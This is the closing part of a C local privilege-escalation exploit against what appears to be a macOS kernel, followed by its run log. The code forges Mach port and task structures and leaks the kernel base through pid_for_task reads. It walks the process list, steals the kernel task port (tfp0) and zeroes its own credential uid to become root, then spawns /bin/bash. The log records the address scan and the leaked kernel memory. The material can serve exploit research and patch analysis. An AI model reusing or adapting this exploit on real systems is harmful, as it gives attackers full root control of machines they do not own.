            *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff;

            // fakeport->io_bits = IKOT_CLOCK | IO_BITS_ACTIVE ;
            kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0);
            //printf("%d\t kern_fail\n", kret, KERN_FAILURE);
            if (kret != KERN_FAILURE) {
                goto gotclock;
            }
        }
        printf("fail, address:%llx\n",textbase + i*0x100000 + 0x500000 + k );
    }

    printf("can't find clock task.\n");
    return -1;

    //found clock task
gotclock:

    printf("found clock\n");
    // Stage 3 (README.md): retag fakeport as a task port whose task pointer
    // (offset 0x68) is faketask, the next 4 KiB page of the same mapping.
    // The 0xff at 0xa0 and 0xee at faketask+0x10 are presumably reference
    // counts for this build's layout; README.md does not name the fields.
    fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE;
    fakeport->io_references = 0xff;
    char* faketask = ((char*)fakeport) + 0x1000;

    // The value the scan left at offset 0x68 is the address of clock_list[SYSTEM_CLOCK],
    // a kernel data symbol. Read it back before the slot is repointed at faketask.
    uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68);
    printf("leaked_ptr:%llx\n", leaked_ptr);
    *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask;
    *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff;
    *(uint64_t*) (faketask + 0x10) = 0xee;

    // back to the start of the page (16 KiB boundary)
    leaked_ptr &= ~0x3FFF;
    printf("clock task ptr = 0x%llx\n",leaked_ptr);
    // int leaked = 0;
    //kr32(leaked_ptr, &leaked);
    // printf("%llx\n", leaked);
    // Walk downward one 0x4000 page at a time, reading the first 4 bytes of
    // each page with the pid_for_task primitive, until the Mach-O magic
    // MH_MAGIC_64 (0xfeedfacf, README.md) marks the kernel header. Unbounded:
    // if the magic never appears the loop reads below the kernel indefinitely.
    while(1){
        int leaked = 0;
        *(uint64_t *)(faketask + 0x380) = leaked_ptr - 0x10;
        pid_for_task(foundport, &leaked);
        printf("leaked:%x\n", leaked);
        if (leaked == MH_MAGIC_64) {
            printf("found kernel text at 0x%llx\n", leaked_ptr);
            break;
        }
        leaked_ptr -= 0x4000;
    }

    //found kernel base
    uint64_t kernel_base = leaked_ptr;


    //0xFFFFFF8000ABC490 _allproc
    //0xFFFFFF8000200000 kernel text base
    //offset = 0xFFFFFF8000ABC490-0xFFFFFF8000200000
    // Symbol offset for one specific kernel build (see file header note).
    uint64_t allproc_offset = 0x8bc490;

    uint64_t allproc = allproc_offset + kernel_base;

    uint64_t proc_ = allproc;

    uint64_t myproc = 0;
    uint64_t kernproc = 0;

    //find kernel proc
    // Follow the process list: the first 8 bytes of each entry (read as two
    // 4-byte halves) are the link, the 4 bytes at +0x10 the pid. pid 0 is the
    // kernel proc, getpid() is this process. Stops only when the link is 0.
    while (proc_) {
        uint64_t proc = 0;

        kr32(proc_, (int32_t*)&proc);
        kr32(proc_+4, (int32_t*)(((uint64_t)(&proc)) + 4));

        int pd = 0;

        kr32(proc+0x10, (int32_t*)&pd);

        if (pd == getpid()) {
            myproc = proc;
        } else if (pd == 0){
            kernproc = proc;
        }
        proc_ = proc;
    }

    printf("kernproc:%llx\n", kernproc);
    // Stage 4 (README.md): kernproc+0x18 -> kernel task; kern_task+0xe8 ->
    // itk_sself, the kernel task's own port. Both read as two 4-byte halves.
    uint64_t kern_task = 0;
    kr32(kernproc+0x18, (int32_t*)&kern_task);
    kr32(kernproc+0x18+4 , (int32_t*)(((uint64_t)(&kern_task)) + 4));
    uint64_t itk_kern_sself = 0;
    kr32(kern_task+0xe8, (int32_t*)&itk_kern_sself);
    kr32(kern_task+0xe8+4 , (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4));

    // Dump one page each of the real kernel task port and kernel task, 4 bytes
    // at a time (0x400 reads each), into scratch buffers.
    char* faketaskport = malloc(0x1000);
    char* ktaskdump = malloc(0x1000);

    for (int i = 0; i < 0x1000/4; i++) {
        kr32(itk_kern_sself+i*4, (int32_t*)(&faketaskport[i*4]));
    }

    for (int i = 0; i < 0x1000/4; i++) {
        kr32(kern_task+i*4, (int32_t*)(&ktaskdump[i*4]));
    }

    //dump kernel task port
    // Overlay the copies onto the fake port/task pages, then re-point the
    // fake port at the fake task and store the real kernel task port at
    // faketask+0x2b8 -- per README.md, the fake kernel task's bootstrap port slot.
    memcpy(fakeport, faketaskport, 0x1000);
    memcpy(faketask, ktaskdump, 0x1000);


    *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask;
    *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff;

    *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself;

    //get kernel task
    // 4 is TASK_BOOTSTRAP_PORT; this returns a send right to the real kernel
    // task. The return value is unchecked: on failure tfp0 stays MACH_PORT_NULL
    // and every ReadAnywhere/WriteAnywhere below silently does nothing.
    task_get_special_port(foundport, 4, &tfp0);

    // Clear the active bit so the kernel stops treating the fake port as live (presumably).
    fakeport->io_bits = 0;

    uint64_t slide;
    slide = kernel_base - 0xFFFFFF8000200000;

    printf("kernel_base=0x%llx slide=0x%llx header=0x%llx\n",kernel_base, slide,ReadAnywhere64(kernel_base));

    //get root
    // Credential pointer at myproc+0xe8; the 8 bytes at cred+0x18 are zeroed,
    // presumably the uid. The getuid() print below is the author's check.
    uint64_t cred = ReadAnywhere64(myproc+0xe8);

    WriteAnywhere64(cred+0x18,0);

    printf("getuid = %d\n", getuid());

    //get shell
    // Blocks until the shell exits; return value unchecked.
    system("/bin/bash");

    return 0;
}
-------------------------------------------------------------------------------- /tmp.out: -------------------------------------------------------------------------------- 1 | create voucher = 0xc03 2 | fakeport=0x0x8414000 3 | roundupnumber:4096 4 | alloc_size:8192 5 | pagesize:4096 6 | base:844f000 7 | roundupact:4096 8 | end:8450000 9 | ptz[z]=0x32d03 10 | found port! 11 | fail, address:ffffff8000740000 12 | fail, address:ffffff8000840000 13 | fail, address:ffffff8000940000 14 | fail, address:ffffff8000a40000 15 | fail, address:ffffff8000b40000 16 | fail, address:ffffff8000c40000 17 | fail, address:ffffff8000d40000 18 | fail, address:ffffff8000e40000 19 | fail, address:ffffff8000f40000 20 | fail, address:ffffff8001040000 21 | fail, address:ffffff8001140000 22 | fail, address:ffffff8001240000 23 | fail, address:ffffff8001340000 24 | fail, address:ffffff8001440000 25 | fail, address:ffffff8001540000 26 | fail, address:ffffff8001640000 27 | fail, address:ffffff8001740000 28 | fail, address:ffffff8001840000 29 | fail, address:ffffff8001940000 30 | fail, address:ffffff8001a40000 31 | fail, address:ffffff8001b40000 32 | fail, address:ffffff8001c40000 33 | fail, address:ffffff8001d40000 34 | fail, address:ffffff8001e40000 35 | fail, address:ffffff8001f40000 36 | fail, address:ffffff8002040000 37 | fail, address:ffffff8002140000 38 | fail, address:ffffff8002240000 39 | fail, address:ffffff8002340000 40 | fail, address:ffffff8002440000 41 | fail, address:ffffff8002540000 42 | fail, address:ffffff8002640000 43 | fail, address:ffffff8002740000 44 | fail, address:ffffff8002840000 45 | 
fail, address:ffffff8002940000 46 | fail, address:ffffff8002a40000 47 | fail, address:ffffff8002b40000 48 | fail, address:ffffff8002c40000 49 | fail, address:ffffff8002d40000 50 | fail, address:ffffff8002e40000 51 | fail, address:ffffff8002f40000 52 | fail, address:ffffff8003040000 53 | fail, address:ffffff8003140000 54 | fail, address:ffffff8003240000 55 | fail, address:ffffff8003340000 56 | fail, address:ffffff8003440000 57 | fail, address:ffffff8003540000 58 | fail, address:ffffff8003640000 59 | fail, address:ffffff8003740000 60 | fail, address:ffffff8003840000 61 | fail, address:ffffff8003940000 62 | fail, address:ffffff8003a40000 63 | fail, address:ffffff8003b40000 64 | fail, address:ffffff8003c40000 65 | fail, address:ffffff8003d40000 66 | fail, address:ffffff8003e40000 67 | fail, address:ffffff8003f40000 68 | fail, address:ffffff8004040000 69 | fail, address:ffffff8004140000 70 | fail, address:ffffff8004240000 71 | fail, address:ffffff8004340000 72 | fail, address:ffffff8004440000 73 | fail, address:ffffff8004540000 74 | fail, address:ffffff8004640000 75 | fail, address:ffffff8004740000 76 | fail, address:ffffff8004840000 77 | fail, address:ffffff8004940000 78 | fail, address:ffffff8004a40000 79 | fail, address:ffffff8004b40000 80 | fail, address:ffffff8004c40000 81 | fail, address:ffffff8004d40000 82 | fail, address:ffffff8004e40000 83 | fail, address:ffffff8004f40000 84 | fail, address:ffffff8005040000 85 | fail, address:ffffff8005140000 86 | fail, address:ffffff8005240000 87 | fail, address:ffffff8005340000 88 | fail, address:ffffff8005440000 89 | fail, address:ffffff8005540000 90 | fail, address:ffffff8005640000 91 | fail, address:ffffff8005740000 92 | fail, address:ffffff8005840000 93 | fail, address:ffffff8005940000 94 | fail, address:ffffff8005a40000 95 | fail, address:ffffff8005b40000 96 | fail, address:ffffff8005c40000 97 | fail, address:ffffff8005d40000 98 | fail, address:ffffff8005e40000 99 | fail, address:ffffff8005f40000 100 | fail, 
address:ffffff8006040000 101 | fail, address:ffffff8006140000 102 | fail, address:ffffff8006240000 103 | fail, address:ffffff8006340000 104 | fail, address:ffffff8006440000 105 | fail, address:ffffff8006540000 106 | fail, address:ffffff8006640000 107 | fail, address:ffffff8006740000 108 | fail, address:ffffff8006840000 109 | fail, address:ffffff8006940000 110 | fail, address:ffffff8006a40000 111 | fail, address:ffffff8006b40000 112 | fail, address:ffffff8006c40000 113 | fail, address:ffffff8006d40000 114 | fail, address:ffffff8006e40000 115 | fail, address:ffffff8006f40000 116 | fail, address:ffffff8007040000 117 | fail, address:ffffff8007140000 118 | fail, address:ffffff8007240000 119 | fail, address:ffffff8007340000 120 | fail, address:ffffff8007440000 121 | fail, address:ffffff8007540000 122 | fail, address:ffffff8007640000 123 | fail, address:ffffff8007740000 124 | fail, address:ffffff8007840000 125 | fail, address:ffffff8007940000 126 | fail, address:ffffff8007a40000 127 | fail, address:ffffff8007b40000 128 | fail, address:ffffff8007c40000 129 | fail, address:ffffff8007d40000 130 | fail, address:ffffff8007e40000 131 | fail, address:ffffff8007f40000 132 | fail, address:ffffff8008040000 133 | fail, address:ffffff8008140000 134 | fail, address:ffffff8008240000 135 | fail, address:ffffff8008340000 136 | fail, address:ffffff8008440000 137 | fail, address:ffffff8008540000 138 | fail, address:ffffff8008640000 139 | fail, address:ffffff8008740000 140 | fail, address:ffffff8008840000 141 | fail, address:ffffff8008940000 142 | fail, address:ffffff8008a40000 143 | fail, address:ffffff8008b40000 144 | fail, address:ffffff8008c40000 145 | fail, address:ffffff8008d40000 146 | fail, address:ffffff8008e40000 147 | fail, address:ffffff8008f40000 148 | fail, address:ffffff8009040000 149 | fail, address:ffffff8009140000 150 | fail, address:ffffff8009240000 151 | fail, address:ffffff8009340000 152 | fail, address:ffffff8009440000 153 | fail, address:ffffff8009540000 154 | fail, 
address:ffffff8009640000 155 | fail, address:ffffff8009740000 156 | fail, address:ffffff8009840000 157 | fail, address:ffffff8009940000 158 | fail, address:ffffff8009a40000 159 | fail, address:ffffff8009b40000 160 | fail, address:ffffff8009c40000 161 | fail, address:ffffff8009d40000 162 | fail, address:ffffff8009e40000 163 | fail, address:ffffff8009f40000 164 | fail, address:ffffff800a040000 165 | fail, address:ffffff800a140000 166 | fail, address:ffffff800a240000 167 | fail, address:ffffff800a340000 168 | fail, address:ffffff800a440000 169 | fail, address:ffffff800a540000 170 | fail, address:ffffff800a640000 171 | fail, address:ffffff800a740000 172 | fail, address:ffffff800a840000 173 | fail, address:ffffff800a940000 174 | fail, address:ffffff800aa40000 175 | fail, address:ffffff800ab40000 176 | fail, address:ffffff800ac40000 177 | fail, address:ffffff800ad40000 178 | fail, address:ffffff800ae40000 179 | fail, address:ffffff800af40000 180 | fail, address:ffffff800b040000 181 | fail, address:ffffff800b140000 182 | fail, address:ffffff800b240000 183 | fail, address:ffffff800b340000 184 | fail, address:ffffff800b440000 185 | fail, address:ffffff800b540000 186 | fail, address:ffffff800b640000 187 | fail, address:ffffff800b740000 188 | fail, address:ffffff800b840000 189 | fail, address:ffffff800b940000 190 | fail, address:ffffff800ba40000 191 | fail, address:ffffff800bb40000 192 | fail, address:ffffff800bc40000 193 | fail, address:ffffff800bd40000 194 | fail, address:ffffff800be40000 195 | fail, address:ffffff800bf40000 196 | fail, address:ffffff800c040000 197 | fail, address:ffffff800c140000 198 | fail, address:ffffff800c240000 199 | fail, address:ffffff800c340000 200 | fail, address:ffffff800c440000 201 | fail, address:ffffff800c540000 202 | fail, address:ffffff800c640000 203 | fail, address:ffffff800c740000 204 | fail, address:ffffff800c840000 205 | fail, address:ffffff800c940000 206 | fail, address:ffffff800ca40000 207 | fail, address:ffffff800cb40000 208 | fail, 
address:ffffff800cc40000 209 | fail, address:ffffff800cd40000 210 | fail, address:ffffff800ce40000 211 | fail, address:ffffff800cf40000 212 | fail, address:ffffff800d040000 213 | fail, address:ffffff800d140000 214 | fail, address:ffffff800d240000 215 | fail, address:ffffff800d340000 216 | fail, address:ffffff800d440000 217 | fail, address:ffffff800d540000 218 | fail, address:ffffff800d640000 219 | fail, address:ffffff800d740000 220 | fail, address:ffffff800d840000 221 | fail, address:ffffff800d940000 222 | fail, address:ffffff800da40000 223 | fail, address:ffffff800db40000 224 | fail, address:ffffff800dc40000 225 | fail, address:ffffff800dd40000 226 | fail, address:ffffff800de40000 227 | fail, address:ffffff800df40000 228 | fail, address:ffffff800e040000 229 | fail, address:ffffff800e140000 230 | fail, address:ffffff800e240000 231 | fail, address:ffffff800e340000 232 | fail, address:ffffff800e440000 233 | fail, address:ffffff800e540000 234 | fail, address:ffffff800e640000 235 | fail, address:ffffff800e740000 236 | fail, address:ffffff800e840000 237 | fail, address:ffffff800e940000 238 | fail, address:ffffff800ea40000 239 | fail, address:ffffff800eb40000 240 | fail, address:ffffff800ec40000 241 | fail, address:ffffff800ed40000 242 | fail, address:ffffff800ee40000 243 | fail, address:ffffff800ef40000 244 | fail, address:ffffff800f040000 245 | fail, address:ffffff800f140000 246 | fail, address:ffffff800f240000 247 | fail, address:ffffff800f340000 248 | fail, address:ffffff800f440000 249 | fail, address:ffffff800f540000 250 | fail, address:ffffff800f640000 251 | fail, address:ffffff800f740000 252 | fail, address:ffffff800f840000 253 | fail, address:ffffff800f940000 254 | fail, address:ffffff800fa40000 255 | fail, address:ffffff800fb40000 256 | fail, address:ffffff800fc40000 257 | fail, address:ffffff800fd40000 258 | fail, address:ffffff800fe40000 259 | fail, address:ffffff800ff40000 260 | fail, address:ffffff8010040000 261 | fail, address:ffffff8010140000 262 | fail, 
address:ffffff8010240000 263 | fail, address:ffffff8010340000 264 | fail, address:ffffff8010440000 265 | fail, address:ffffff8010540000 266 | fail, address:ffffff8010640000 267 | fail, address:ffffff8010740000 268 | fail, address:ffffff8010840000 269 | fail, address:ffffff8010940000 270 | fail, address:ffffff8010a40000 271 | fail, address:ffffff8010b40000 272 | fail, address:ffffff8010c40000 273 | fail, address:ffffff8010d40000 274 | fail, address:ffffff8010e40000 275 | fail, address:ffffff8010f40000 276 | fail, address:ffffff8011040000 277 | fail, address:ffffff8011140000 278 | fail, address:ffffff8011240000 279 | fail, address:ffffff8011340000 280 | fail, address:ffffff8011440000 281 | fail, address:ffffff8011540000 282 | fail, address:ffffff8011640000 283 | fail, address:ffffff8011740000 284 | fail, address:ffffff8011840000 285 | fail, address:ffffff8011940000 286 | fail, address:ffffff8011a40000 287 | fail, address:ffffff8011b40000 288 | fail, address:ffffff8011c40000 289 | fail, address:ffffff8011d40000 290 | fail, address:ffffff8011e40000 291 | fail, address:ffffff8011f40000 292 | fail, address:ffffff8012040000 293 | fail, address:ffffff8012140000 294 | fail, address:ffffff8012240000 295 | fail, address:ffffff8012340000 296 | fail, address:ffffff8012440000 297 | fail, address:ffffff8012540000 298 | fail, address:ffffff8012640000 299 | fail, address:ffffff8012740000 300 | fail, address:ffffff8012840000 301 | fail, address:ffffff8012940000 302 | fail, address:ffffff8012a40000 303 | fail, address:ffffff8012b40000 304 | fail, address:ffffff8012c40000 305 | fail, address:ffffff8012d40000 306 | fail, address:ffffff8012e40000 307 | fail, address:ffffff8012f40000 308 | fail, address:ffffff8013040000 309 | fail, address:ffffff8013140000 310 | fail, address:ffffff8013240000 311 | fail, address:ffffff8013340000 312 | fail, address:ffffff8013440000 313 | fail, address:ffffff8013540000 314 | fail, address:ffffff8013640000 315 | fail, address:ffffff8013740000 316 | fail, 
address:ffffff8013840000 317 | fail, address:ffffff8013940000 318 | fail, address:ffffff8013a40000 319 | fail, address:ffffff8013b40000 320 | fail, address:ffffff8013c40000 321 | fail, address:ffffff8013d40000 322 | fail, address:ffffff8013e40000 323 | fail, address:ffffff8013f40000 324 | fail, address:ffffff8014040000 325 | fail, address:ffffff8014140000 326 | fail, address:ffffff8014240000 327 | fail, address:ffffff8014340000 328 | fail, address:ffffff8014440000 329 | fail, address:ffffff8014540000 330 | fail, address:ffffff8014640000 331 | fail, address:ffffff8014740000 332 | fail, address:ffffff8014840000 333 | fail, address:ffffff8014940000 334 | fail, address:ffffff8014a40000 335 | fail, address:ffffff8014b40000 336 | fail, address:ffffff8014c40000 337 | fail, address:ffffff8014d40000 338 | fail, address:ffffff8014e40000 339 | fail, address:ffffff8014f40000 340 | fail, address:ffffff8015040000 341 | fail, address:ffffff8015140000 342 | fail, address:ffffff8015240000 343 | fail, address:ffffff8015340000 344 | fail, address:ffffff8015440000 345 | fail, address:ffffff8015540000 346 | fail, address:ffffff8015640000 347 | fail, address:ffffff8015740000 348 | fail, address:ffffff8015840000 349 | fail, address:ffffff8015940000 350 | fail, address:ffffff8015a40000 351 | fail, address:ffffff8015b40000 352 | fail, address:ffffff8015c40000 353 | fail, address:ffffff8015d40000 354 | fail, address:ffffff8015e40000 355 | fail, address:ffffff8015f40000 356 | fail, address:ffffff8016040000 357 | fail, address:ffffff8016140000 358 | fail, address:ffffff8016240000 359 | fail, address:ffffff8016340000 360 | fail, address:ffffff8016440000 361 | fail, address:ffffff8016540000 362 | fail, address:ffffff8016640000 363 | fail, address:ffffff8016740000 364 | fail, address:ffffff8016840000 365 | fail, address:ffffff8016940000 366 | fail, address:ffffff8016a40000 367 | fail, address:ffffff8016b40000 368 | fail, address:ffffff8016c40000 369 | fail, address:ffffff8016d40000 370 | fail, 
address:ffffff8016e40000 371 | fail, address:ffffff8016f40000 372 | fail, address:ffffff8017040000 373 | fail, address:ffffff8017140000 374 | fail, address:ffffff8017240000 375 | fail, address:ffffff8017340000 376 | fail, address:ffffff8017440000 377 | fail, address:ffffff8017540000 378 | fail, address:ffffff8017640000 379 | fail, address:ffffff8017740000 380 | fail, address:ffffff8017840000 381 | fail, address:ffffff8017940000 382 | fail, address:ffffff8017a40000 383 | fail, address:ffffff8017b40000 384 | fail, address:ffffff8017c40000 385 | fail, address:ffffff8017d40000 386 | fail, address:ffffff8017e40000 387 | fail, address:ffffff8017f40000 388 | fail, address:ffffff8018040000 389 | fail, address:ffffff8018140000 390 | fail, address:ffffff8018240000 391 | fail, address:ffffff8018340000 392 | fail, address:ffffff8018440000 393 | fail, address:ffffff8018540000 394 | fail, address:ffffff8018640000 395 | fail, address:ffffff8018740000 396 | fail, address:ffffff8018840000 397 | fail, address:ffffff8018940000 398 | fail, address:ffffff8018a40000 399 | fail, address:ffffff8018b40000 400 | fail, address:ffffff8018c40000 401 | fail, address:ffffff8018d40000 402 | fail, address:ffffff8018e40000 403 | fail, address:ffffff8018f40000 404 | fail, address:ffffff8019040000 405 | fail, address:ffffff8019140000 406 | found clock 407 | leaked_ptr:ffffff80192271c0 408 | clock task ptr = 0xffffff8019224000 409 | leaked:0 410 | leaked:0 411 | leaked:0 412 | leaked:0 413 | leaked:0 414 | leaked:0 415 | leaked:0 416 | leaked:633e0000 417 | leaked:0 418 | leaked:18908000 419 | leaked:726f5765 420 | leaked:68003138 421 | leaked:31332e39 422 | leaked:32353a 423 | leaked:776e7520 424 | leaked:65657266 425 | leaked:746f6e20 426 | leaked:782e656c 427 | leaked:4749425f 428 | leaked:632e676f 429 | leaked:72617262 430 | leaked:622f322e 431 | leaked:70797420 432 | leaked:74636574 433 | leaked:6d6e6920 434 | leaked:332e3938 435 | leaked:322e3133 436 | leaked:3d212072 437 | leaked:656c7070 438 | 
leaked:65626d65 439 | leaked:64253a73 440 | leaked:3a732500 441 | leaked:29642520 442 | leaked:6f632f73 443 | leaked:37332d75 444 | leaked:735f706f 445 | leaked:39383733 446 | leaked:746f6f62 447 | leaked:25203a73 448 | leaked:25783230 449 | leaked:6c363130 450 | leaked:692f6b6d 451 | leaked:2f736563 452 | leaked:6f632f73 453 | leaked:74735f70 454 | leaked:6d695f72 455 | leaked:6c6c6162 456 | leaked:61007469 457 | leaked:5600736c 458 | leaked:726f6d65 459 | leaked:ffffffff 460 | leaked:ffffffff 461 | leaked:0 462 | leaked:0 463 | leaked:0 464 | leaked:0 465 | leaked:6b4a2ec0 466 | leaked:1e92005a 467 | leaked:d9d9d9d9 468 | leaked:ffff3b82 469 | leaked:bb9 470 | leaked:48000007 471 | leaked:f8833e74 472 | leaked:f9e8f689 473 | leaked:30850fc0 474 | leaked:e8de8948 475 | leaked:93840f 476 | leaked:1ab52d 477 | leaked:2a80000 478 | leaked:d5 479 | leaked:48b8558b 480 | leaked:bd058b33 481 | leaked:10ba4846 482 | leaked:840fdb85 483 | leaked:89410000 484 | leaked:1cb664 485 | leaked:c8440f48 486 | leaked:4e74f685 487 | leaked:3d8b48ff 488 | leaked:74c83948 489 | leaked:1b641ff 490 | leaked:f9830830 491 | leaked:eb2850ff 492 | leaked:1b02850 493 | leaked:204d8941 494 | leaked:8d41ffff 495 | leaked:e5894855 496 | leaked:4e74f685 497 | leaked:e5894855 498 | leaked:c35d5f41 499 | leaked:2046c7 500 | leaked:fff6894c 501 | leaked:58d48ff 502 | leaked:798348c0 503 | leaked:cc894d18 504 | leaked:b8830000 505 | leaked:f7000000 506 | leaked:df894800 507 | leaked:1b7 508 | leaked:b0558d48 509 | leaked:6666c35d 510 | leaked:e5894855 511 | leaked:8a424675 512 | leaked:74e4854d 513 | leaked:933ae800 514 | leaked:113d8b48 515 | leaked:7274d455 516 | leaked:4ce43145 517 | leaked:eb000000 518 | leaked:e6894cf7 519 | leaked:d901f989 520 | leaked:48d00148 521 | leaked:fffffe 522 | leaked:c9310000 523 | leaked:ff8b207c 524 | leaked:e5894855 525 | leaked:48038b48 526 | leaked:666666ff 527 | leaked:854dc689 528 | leaked:49e80000 529 | leaked:f8830146 530 | leaked:8d48068b 531 | 
leaked:e5894855 532 | leaked:e5894855 533 | leaked:ffffd214 534 | leaked:47883 535 | leaked:d3870fff 536 | leaked:1575383d 537 | leaked:8b490000 538 | leaked:18438948 539 | leaked:48001cc0 540 | leaked:8548ffa8 541 | leaked:2f75000d 542 | leaked:8d48001d 543 | leaked:8b420000 544 | leaked:48ff8941 545 | leaked:8948ffaf 546 | leaked:187701fe 547 | leaked:1c74e485 548 | leaked:8 549 | leaked:666666ff 550 | leaked:ffaafe2c 551 | leaked:48e9ffff 552 | leaked:41ffb0a0 553 | leaked:fe8ae8d0 554 | leaked:fffad085 555 | leaked:380808b 556 | leaked:4818478b 557 | leaked:fffffa63 558 | leaked:45358d48 559 | leaked:29cb3c 560 | leaked:e5894855 561 | leaked:41204889 562 | leaked:f000001 563 | leaked:3b14408b 564 | leaked:f748c889 565 | leaked:83213d83 566 | leaked:4 567 | leaked:894c0f74 568 | leaked:4d000000 569 | leaked:457402fe 570 | leaked:c8890b8b 571 | leaked:65000000 572 | leaked:b8000000 573 | leaked:c8c481 574 | leaked:70858b48 575 | leaked:18868b49 576 | leaked:44b85d89 577 | leaked:22358d48 578 | leaked:77dc8949 579 | leaked:8bffb760 580 | leaked:4894800 581 | leaked:fffe8349 582 | leaked:1beff 583 | leaked:ffffffe 584 | leaked:7701ff83 585 | leaked:88410324 586 | leaked:b40a7be8 587 | leaked:1000e1 588 | leaked:48000000 589 | leaked:240b883 590 | leaked:a0458948 591 | leaked:f4b589ff 592 | leaked:f480000 593 | leaked:4ba06 594 | leaked:fffb10e9 595 | leaked:3d8d48ef 596 | leaked:f1358d48 597 | leaked:49000000 598 | leaked:ff4508b 599 | leaked:4921894c 600 | leaked:448d49c4 601 | leaked:4c8b4900 602 | leaked:e43145ff 603 | leaked:e5894855 604 | leaked:e8c78948 605 | leaked:e81ae8c0 606 | leaked:fff45adc 607 | leaked:56b60f41 608 | leaked:2b840f00 609 | leaked:4ca8ebff 610 | leaked:2c7e6c 611 | leaked:df8948ff 612 | leaked:e5894855 613 | leaked:3944c8ff 614 | leaked:48000000 615 | leaked:a0758948 616 | leaked:35be3e 617 | leaked:10508b48 618 | leaked:c0fe0000 619 | leaked:fffff8da 620 | leaked:a8858b00 621 | leaked:24748a45 622 | leaked:f45c189 623 | leaked:8b480846 
624 | leaked:ffc03145 625 | leaked:3145ffff 626 | leaked:48ffbe0a 627 | leaked:e8f6894c 628 | leaked:45894810 629 | leaked:8d4809eb 630 | leaked:e68944ef 631 | leaked:5d896608 632 | leaked:48c829f9 633 | leaked:148ffff 634 | leaked:e5894855 635 | leaked:8b207ec0 636 | leaked:4b900 637 | leaked:8948b04d 638 | leaked:480033ae 639 | leaked:31000000 640 | leaked:fffff7e0 641 | leaked:c9849d4d 642 | leaked:fe4854d 643 | leaked:45008b48 644 | leaked:1bf 645 | leaked:ce430f45 646 | leaked:556 647 | leaked:28b841de 648 | leaked:fffff91e 649 | leaked:2374c439 650 | leaked:ffc3fb7c 651 | leaked:16 652 | leaked:0 653 | leaked:674c085 654 | leaked:83f60975 655 | leaked:4c1d7501 656 | leaked:c083 657 | leaked:43c71843 658 | leaked:10b8 659 | leaked:8b48ce75 660 | leaked:347b83 661 | leaked:c6c39be8 662 | leaked:f7 663 | leaked:1 664 | leaked:ebc00206 665 | leaked:3d8d481d 666 | leaked:cd202be8 667 | leaked:8bc8440f 668 | leaked:8d48ffff 669 | leaked:4c0928b 670 | leaked:b34b60f 671 | leaked:4f178c 672 | leaked:f304639 673 | leaked:8bc1440f 674 | leaked:4a001 675 | leaked:4ba0000 676 | leaked:468a4173 677 | leaked:788b4900 678 | leaked:4c404289 679 | leaked:48003baf 680 | leaked:2d684 681 | leaked:c03102eb 682 | leaked:eb0124f0 683 | leaked:ce89404a 684 | leaked:848b41c0 685 | leaked:31003d26 686 | leaked:e5894855 687 | leaked:4850b60f 688 | leaked:8075b60f 689 | leaked:1be 690 | leaked:9045c622 691 | leaked:8d480042 692 | leaked:7401f983 693 | leaked:e5894855 694 | leaked:666611eb 695 | leaked:30958d48 696 | leaked:49c 697 | leaked:8b48c689 698 | leaked:c3894830 699 | leaked:c7b60f40 700 | leaked:e2894cde 701 | leaked:20693cba 702 | leaked:f766744f 703 | leaked:858bffff 704 | leaked:88 705 | leaked:840f66fb 706 | leaked:b9258d4c 707 | leaked:ffd7602c 708 | leaked:a02ae8e6 709 | leaked:1f8838b 710 | leaked:668d4d3e 711 | leaked:c7660000 712 | leaked:1c4ae8df 713 | leaked:850f2ef8 714 | leaked:6d8b4d 715 | leaked:c1483fe9 716 | leaked:e5894855 717 | leaked:5a7a3b 718 | 
leaked:8b481f74 719 | leaked:f7894800 720 | leaked:48fffffe 721 | leaked:5850f65 722 | leaked:1fe28303 723 | leaked:8b4cd8b6 724 | leaked:2d8d4cff 725 | leaked:e5894855 726 | leaked:38bd8d48 727 | leaked:72e0394c 728 | leaked:8545d07d 729 | leaked:31fffffd 730 | leaked:585ebc 731 | leaked:83417c47 732 | leaked:3042c7 733 | leaked:283d8348 734 | leaked:fffe1c85 735 | leaked:99e8fa89 736 | leaked:ddf2158b 737 | leaked:d231ffe2 738 | leaked:16 739 | leaked:c7000000 740 | leaked:83480474 741 | leaked:f883008b 742 | leaked:d9e8d389 743 | leaked:d98948ea 744 | leaked:894cc031 745 | leaked:f44c295 746 | leaked:e48545c4 747 | leaked:23486 748 | leaked:75894cac 749 | leaked:f7546f8 750 | leaked:de8948ff 751 | leaked:44894818 752 | leaked:c389c839 753 | leaked:45ffffff 754 | leaked:6666663a 755 | leaked:41000000 756 | leaked:41fffeea 757 | leaked:fe78bd83 758 | leaked:8b490848 759 | leaked:83000000 760 | leaked:10438b48 761 | leaked:cb804 762 | leaked:ff350200 763 | leaked:c6940f40 764 | leaked:ffffec9b 765 | leaked:be485f8b 766 | leaked:450f44c1 767 | leaked:1ff 768 | leaked:8d8b48ff 769 | leaked:25c87 770 | leaked:d8 771 | leaked:3c748 772 | leaked:48187189 773 | leaked:487b740b 774 | leaked:7724fd83 775 | leaked:606a358d 776 | leaked:5cedc4 777 | leaked:48020000 778 | leaked:32e9ffff 779 | leaked:c748c689 780 | leaked:c85d8b48 781 | leaked:fc98400 782 | leaked:c7894900 783 | leaked:b0411174 784 | leaked:ffffff08 785 | leaked:5750200 786 | leaked:4810428b 787 | leaked:858944ff 788 | leaked:98458948 789 | leaked:39488045 790 | leaked:894c0000 791 | leaked:48fffffd 792 | leaked:104f8b4d 793 | leaked:7974c085 794 | leaked:2c7a3d8d 795 | leaked:8f80be49 796 | leaked:f6854800 797 | leaked:c73c8348 798 | leaked:8941a055 799 | leaked:b8ec8945 800 | leaked:81480a74 801 | leaked:408b0a74 802 | leaked:9aca00c0 803 | leaked:ebe99090 804 | leaked:3a1a058b 805 | leaked:d989c889 806 | leaked:85000000 807 | leaked:c800069 808 | leaked:c7f741c7 809 | leaked:8948d689 810 | leaked:2145fa89 
